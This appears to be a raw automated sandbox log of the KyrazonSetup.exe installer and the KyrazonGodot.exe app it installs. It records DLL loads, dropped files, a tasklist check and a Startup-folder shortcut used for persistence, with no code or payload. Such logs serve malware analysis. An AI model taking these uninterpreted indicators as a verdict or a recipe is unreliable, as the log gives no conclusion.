Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: mf.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: mfplat.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: rtworkq.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\System32\where.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\KyrazonSetup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq KyrazonGodot.exe" /FO csv
Source: KyrazonGodot.lnk.12.drLNK file: ..\..\..\..\..\..\Local\Programs\KyrazonGodot\KyrazonGodot.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\KyrazonSetup.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\b3cf5a4f-183c-5906-ad23-5f1f95ad8d0eJump to behavior
Source: KyrazonSetup.exeStatic file information: File size 80239576 > 1048576
Source: KyrazonSetup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D3DCompiler_47.pdb source: KyrazonSetup.exe, 00000000.00000003.1806828851.0000000004FA5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\libEGL.dll.pdb source: KyrazonSetup.exe, 00000000.00000003.1861082432.000000000078C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\ffmpeg.dll.pdb source: KyrazonSetup.exe, 00000000.00000003.1808616840.0000000004FA8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D3DCompiler_47.pdbGCTL source: KyrazonSetup.exe, 00000000.00000003.1806828851.0000000004FA5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\vk_swiftshader.dll.pdb source: KyrazonSetup.exe, 00000000.00000003.1864822801.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\vulkan-1.dll.pdb source: KyrazonSetup.exe, 00000000.00000003.1803630374.0000000005600000.00000004.00001000.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1803339063.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1803837379.000000000564F000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeCode function: 12_2_00406DDD LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_00406DDD
Source: KyrazonGodot.exe.0.drStatic PE information: section name: .00cfg
Source: KyrazonGodot.exe.0.drStatic PE information: section name: .gxfg
Source: KyrazonGodot.exe.0.drStatic PE information: section name: .retplne
Source: KyrazonGodot.exe.0.drStatic PE information: section name: .rodata
Source: KyrazonGodot.exe.0.drStatic PE information: section name: CPADinfo
Source: KyrazonGodot.exe.0.drStatic PE information: section name: LZMADEC
Source: KyrazonGodot.exe.0.drStatic PE information: section name: _RDATA
Source: KyrazonGodot.exe.0.drStatic PE information: section name: malloc_h
Source: ffmpeg.dll.0.drStatic PE information: section name: .00cfg
Source: ffmpeg.dll.0.drStatic PE information: section name: .gxfg
Source: ffmpeg.dll.0.drStatic PE information: section name: .retplne
Source: ffmpeg.dll.0.drStatic PE information: section name: _RDATA
Source: KyrazonGodot.exe0.0.drStatic PE information: section name: .00cfg
Source: KyrazonGodot.exe0.0.drStatic PE information: section name: .gxfg
Source: KyrazonGodot.exe0.0.drStatic PE information: section name: .retplne
Source: KyrazonGodot.exe0.0.drStatic PE information: section name: .rodata
Source: KyrazonGodot.exe0.0.drStatic PE information: section name: CPADinfo
Source: KyrazonGodot.exe0.0.drStatic PE information: section name: LZMADEC
Source: KyrazonGodot.exe0.0.drStatic PE information: section name: _RDATA
Source: KyrazonGodot.exe0.0.drStatic PE information: section name: malloc_h
Source: libEGL.dll.0.drStatic PE information: section name: .00cfg
Source: libEGL.dll.0.drStatic PE information: section name: .gxfg
Source: libEGL.dll.0.drStatic PE information: section name: .retplne
Source: libEGL.dll.0.drStatic PE information: section name: _RDATA
Source: libGLESv2.dll.0.drStatic PE information: section name: .00cfg
Source: libGLESv2.dll.0.drStatic PE information: section name: .gxfg
Source: libGLESv2.dll.0.drStatic PE information: section name: .retplne
Source: libGLESv2.dll.0.drStatic PE information: section name: _RDATA
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .00cfg
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .gxfg
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .retplne
Source: vk_swiftshader.dll.0.drStatic PE information: section name: _RDATA
Source: vulkan-1.dll.0.drStatic PE information: section name: .00cfg
Source: vulkan-1.dll.0.drStatic PE information: section name: .gxfg
Source: vulkan-1.dll.0.drStatic PE information: section name: .retplne
Source: vulkan-1.dll.0.drStatic PE information: section name: _RDATA
Source: ffmpeg.dll0.0.drStatic PE information: section name: .00cfg
Source: ffmpeg.dll0.0.drStatic PE information: section name: .gxfg
Source: ffmpeg.dll0.0.drStatic PE information: section name: .retplne
Source: ffmpeg.dll0.0.drStatic PE information: section name: _RDATA
Source: 5ec3d08a-7ef2-4ee9-8eab-fef225a068c8.tmp.node.6.drStatic PE information: section name: _RDATA
Source: 826b8686-c1e5-48d8-8e12-62caf060804a.tmp.node.6.drStatic PE information: section name: _RDATA
Source: 2714d126-6dff-4bf4-9f31-b75695222b09.tmp.node.48.drStatic PE information: section name: _RDATA
Source: aad38a22-07e7-47f5-a3a4-73babbf006a9.tmp.node.48.drStatic PE information: section name: _RDATA
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeCode function: 12_2_00405760 push eax; ret 12_2_0040578E
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\StdUtils.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeFile created: C:\Users\user\AppData\Local\Temp\826b8686-c1e5-48d8-8e12-62caf060804a.tmp.nodeJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeFile created: C:\Users\user\AppData\Local\Temp\2714d126-6dff-4bf4-9f31-b75695222b09.tmp.nodeJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\System.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeFile created: C:\Users\user\AppData\Local\Temp\5ec3d08a-7ef2-4ee9-8eab-fef225a068c8.tmp.nodeJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\SpiderBanner.dllJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\KyrazonGodot.exeJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\ffmpeg.dllJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeFile created: C:\Users\user\AppData\Local\Temp\aad38a22-07e7-47f5-a3a4-73babbf006a9.tmp.nodeJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\nsis7z.dllJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\elevate.exeJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\ffmpeg.dllJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\vk_swiftshader.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeFile created: C:\Users\user\AppData\Local\Temp\5ec3d08a-7ef2-4ee9-8eab-fef225a068c8.tmp.nodeJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeFile created: C:\Users\user\AppData\Local\Temp\826b8686-c1e5-48d8-8e12-62caf060804a.tmp.nodeJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeFile created: C:\Users\user\AppData\Local\Temp\2714d126-6dff-4bf4-9f31-b75695222b09.tmp.nodeJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeFile created: C:\Users\user\AppData\Local\Temp\aad38a22-07e7-47f5-a3a4-73babbf006a9.tmp.nodeJump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\LICENSE.electron.txtJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\ReadMe.txtJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\LICENSE.electron.txtJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\ReadMe.txtJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk
Source: C:\Users\user\Desktop\KyrazonSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\where.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\where.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
